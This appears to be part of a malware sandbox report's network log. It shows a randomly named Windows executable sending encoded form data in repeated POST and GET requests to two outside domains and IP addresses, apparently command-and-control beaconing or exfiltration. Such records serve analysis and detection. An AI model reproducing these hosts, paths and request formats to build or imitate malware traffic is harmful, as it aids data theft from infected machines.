                Data Ascii: AZOTcfex=uQ1boOTJ7vI9FQ9OU+450lBBdjyYHjo9H88/oH4UIRYW2h+7B7dT/hRH3BbsXex0pcKF/T2RGZxmhBykPxTjLsIcv3HwshQo+/eausMpKyCZ4PD/SrOjpMWRKFgSSACZ+kadmoigAYPB8FvhdpWhj86LpESh2z5sPBEEE8OeXggKfyAcE1dFegqnwCFiS4YlJw==
                Aug 23, 2024 04:19:36.939379930 CEST367INHTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 02:27:29 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                10192.168.2.44974743.252.167.188802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:19:38.631367922 CEST816OUTPOST /rm91/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--fhq1c541j0zr.com
                Origin: http://www.xn--fhq1c541j0zr.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 225
                Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 45 49 57 33 46 36 37 43 2f 42 54 38 68 52 48 38 68 62 54 5a 2b 78 2f 70 63 33 6d 2f 53 61 52 47 5a 31 6d 68 41 43 6b 4d 43 37 6b 52 63 49 61 32 6e 48 75 7a 78 51 6f 2b 2f 65 61 75 73 49 51 4b 30 71 5a 35 36 4c 2f 54 4f 79 69 33 63 57 57 65 56 67 53 57 41 43 56 2b 6b 61 2f 6d 73 37 50 41 61 48 42 38 46 66 68 54 63 6a 33 74 38 36 4e 6e 6b 54 6c 34 47 64 6f 57 68 6c 50 62 63 57 62 64 41 6f 57 65 30 52 47 56 45 38 53 4d 67 4f 55 74 46 4d 57 66 37 6c 73 53 78 49 78 41 69 4e 77 71 43 45 7a 38 35 2f 37 7a 71 57 34 66 70 77 3d
                Data Ascii: AZOTcfex=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIEIW3F67C/BT8hRH8hbTZ+x/pc3m/SaRGZ1mhACkMC7kRcIa2nHuzxQo+/eausIQK0qZ56L/TOyi3cWWeVgSWACV+ka/ms7PAaHB8FfhTcj3t86NnkTl4GdoWhlPbcWbdAoWe0RGVE8SMgOUtFMWf7lsSxIxAiNwqCEz85/7zqW4fpw=
                Aug 23, 2024 04:19:39.479496956 CEST367INHTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 02:27:32 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                11192.168.2.44974843.252.167.188802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:19:41.175853014 CEST10898OUTPOST /rm91/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--fhq1c541j0zr.com
                Origin: http://www.xn--fhq1c541j0zr.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10305
                Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 48 6f 57 33 77 75 37 41 65 42 54 39 68 52 48 78 42 62 57 5a 2b 78 75 70 63 66 36 2f 53 47 6e 47 63 70 6d 6a 69 36 6b 59 6a 37 6b 45 4d 49 61 35 48 48 76 73 68 51 35 2b 2f 50 54 75 74 34 51 4b 30 71 5a 35 39 37 2f 58 62 4f 69 31 63 57 52 4b 46 67 57 53 41 44 41 2b 6b 44 49 6d 73 76 6c 56 36 6e 42 6c 6c 50 68 65 4f 37 33 79 4d 36 50 6d 55 54 44 34 47 59 32 57 69 42 6c 62 66 4b 78 64 43 30 57 66 78 51 41 41 6e 73 61 54 6d 65 51 32 6b 6f 4d 45 63 4a 38 62 43 38 2f 44 67 56 73 38 43 77 58 78 4c 69 46 32 61 36 37 62 74 66 66 39 34 41 56 65 53 50 64 45 43 76 35 70 6c 41 61 42 70 6a 49 2f 76 72 59 67 2f 49 35 4f 33 31 63 52 45 39 66 36 59 6b 35 62 4d 7a 51 72 2b 49 4a 37 58 54 4e 31 6d 4a 50 32 33 70 61 4e 65 70 68 2f 53 74 41 66 59 43 54 35 48 59 6d 32 35 59 6f 47 76 78 70 76 30 74 4e 64 74 51 43 72 43 55 39 62 61 31 55 6c 79 56 72 36 34 47 62 49 39 58 48 4c [TRUNCATED]
                Data Ascii: AZOTcfex=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIHoW3wu7AeBT9hRHxBbWZ+xupcf6/SGnGcpmji6kYj7kEMIa5HHvshQ5+/PTut4QK0qZ597/XbOi1cWRKFgWSADA+kDImsvlV6nBllPheO73yM6PmUTD4GY2WiBlbfKxdC0WfxQAAnsaTmeQ2koMEcJ8bC8/DgVs8CwXxLiF2a67btff94AVeSPdECv5plAaBpjI/vrYg/I5O31cRE9f6Yk5bMzQr+IJ7XTN1mJP23paNeph/StAfYCT5HYm25YoGvxpv0tNdtQCrCU9ba1UlyVr64GbI9XHLizt0pVuotL56dcfbRt22sqIkMd51A2wm8EW0SiiNi/QpdtY8XMVE1bwp7GBEL34NQvDeP+UeWn40D/J+yz9oKTMOHMojIE7gwrHQZC3z5phGWjMLqThzYqL4v4hWgBu6MjSrEJ93kGXnxZZ/8fLsyOzpylVY3PZIUFSaXUVMcV9EWisug167GRuBhd63iiG6kUHBGOf8/JSyacK9Whc1aNpDrXFakxg9DsUvjaG2s/DEfgYJLfZTPCoQd5ijEaof0171coCztoVSuQ1msEF+FnhNF7wDIN3+iGk+A3L+18f43ePXdQX+NdciT1g4CDSd14ipxbT1jV1Sm1QFpIXhz1QNtPUQkzRhQDEY2x6RwibrEMn2OQ+LkRrmGCLz5C+DuDpNaonW0MM8DSq1BwhJjeIfs6YbP+366NXxUcl85SJr0sEeKbSwvjzMO+QYy3o9Y4InICSg72javScEAe9yBUfT0HIT32wHcrM6TbOWuMYuib1J61Lxthy37BW2Wa0DJF4j/X1pEK/6Fy09gY7InTaFUn7AeXXXnrzWAt6HNOoYwjEBJ705hAXx1zxI0jQQaLhLFYmeTQQWj1Fc53eNhCnHqD7KGNNWPGNfeHFDCTvaUzaYzbiHbmiWxXImU1bkqsAKvsrHHQjUVqP41wEFaeyhVVotORkpSz [TRUNCATED]
                Aug 23, 2024 04:19:42.069999933 CEST367INHTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 02:27:34 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                12192.168.2.44974943.252.167.188802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:19:43.704086065 CEST518OUTGET /rm91/?bB7L5=DPt0-rQpMXpt&AZOTcfex=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.xn--fhq1c541j0zr.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 23, 2024 04:19:44.581557989 CEST367INHTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 02:27:37 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                13192.168.2.449750194.9.94.85802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:19:49.766351938 CEST796OUTPOST /4hda/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--matfrmn-jxa4m.se
                Origin: http://www.xn--matfrmn-jxa4m.se
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 205
                Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 2f 48 67 49 57 6e 6b 32 43 46 4a 44 59 5a 35 53 2f 5a 30 73 55 33 36 56 4d 78 2b 44 6f 58 76 74 6f 4b 53 57 66 47 4d 6a 79 6b 4d 46 70 30 42 75 67 46 72 74 58 59 6a 77 57 54 4f 56 51 4d 2b 6d 44 32 51 74 6d 4a 76 42 77 63 6e 57 38 42 4a 58 73 7a 71 4b 35 33 51 76 42 74 6d 62 32 64 6d 72 6b 44 69 43 33 2b 66 56 52 76 66 4a 70 41 6a 33 54 7a 55 43 57 5a 74 44 53 52 59 38 45 6f 66 4b 6b 67 77 43 4c 71 33 67 64 35 50 6d 59 43 36 79 41 6f 45 32 58 63 6e 30 59 73 41 46 43 66 32 35 4c 4b 39 55 74 59 5a 59 74 67 75 41 72 58 62 55 38 47 34 48 63 77 3d 3d
                Data Ascii: AZOTcfex=zHwxZv4P/D2M/HgIWnk2CFJDYZ5S/Z0sU36VMx+DoXvtoKSWfGMjykMFp0BugFrtXYjwWTOVQM+mD2QtmJvBwcnW8BJXszqK53QvBtmb2dmrkDiC3+fVRvfJpAj3TzUCWZtDSRY8EofKkgwCLq3gd5PmYC6yAoE2Xcn0YsAFCf25LK9UtYZYtguArXbU8G4Hcw==
                Aug 23, 2024 04:19:50.401520967 CEST1236INHTTP/1.1 200 OK
                Server: nginx
                Date: Fri, 23 Aug 2024 02:19:50 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                X-Powered-By: PHP/8.1.29
                Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                Aug 23, 2024 04:19:50.401580095 CEST1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                Aug 23, 2024 04:19:50.401617050 CEST1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                Aug 23, 2024 04:19:50.401652098 CEST1236INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                Aug 23, 2024 04:19:50.401712894 CEST878INData Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                14192.168.2.449751194.9.94.85802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:19:52.319443941 CEST816OUTPOST /4hda/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--matfrmn-jxa4m.se
                Origin: http://www.xn--matfrmn-jxa4m.se
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 225
                Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 37 74 76 75 57 57 65 48 4d 6a 78 6b 4d 46 37 55 41 6c 75 6c 72 36 58 59 2f 34 57 53 79 56 51 4d 36 6d 44 79 55 74 6d 2b 44 43 78 4d 6e 55 30 68 4a 52 6f 7a 71 4b 35 33 51 76 42 74 44 32 32 64 2b 72 6e 7a 53 43 32 63 33 4b 62 50 65 37 75 41 6a 33 45 6a 56 46 57 5a 73 7a 53 55 34 57 45 71 33 4b 6b 6b 30 43 4c 59 50 6a 4f 5a 4f 74 58 69 36 6e 50 49 45 35 51 50 4b 4a 52 72 6f 2f 4e 74 6d 6c 48 73 73 4f 38 70 34 50 2f 67 4b 7a 32 51 53 67 78 46 46 4f 48 30 77 34 4f 52 4a 79 4d 44 38 49 34 71 37 44 79 2f 52 71 70 6e 34 3d
                Data Ascii: AZOTcfex=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boF7tvuWWeHMjxkMF7UAlulr6XY/4WSyVQM6mDyUtm+DCxMnU0hJRozqK53QvBtD22d+rnzSC2c3KbPe7uAj3EjVFWZszSU4WEq3Kkk0CLYPjOZOtXi6nPIE5QPKJRro/NtmlHssO8p4P/gKz2QSgxFFOH0w4ORJyMD8I4q7Dy/Rqpn4=
                Aug 23, 2024 04:19:52.981643915 CEST1236INHTTP/1.1 200 OK
                Server: nginx
                Date: Fri, 23 Aug 2024 02:19:52 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                X-Powered-By: PHP/8.1.29
                Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                Aug 23, 2024 04:19:52.981703997 CEST1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                Aug 23, 2024 04:19:52.981740952 CEST1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                Aug 23, 2024 04:19:52.981776953 CEST672INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
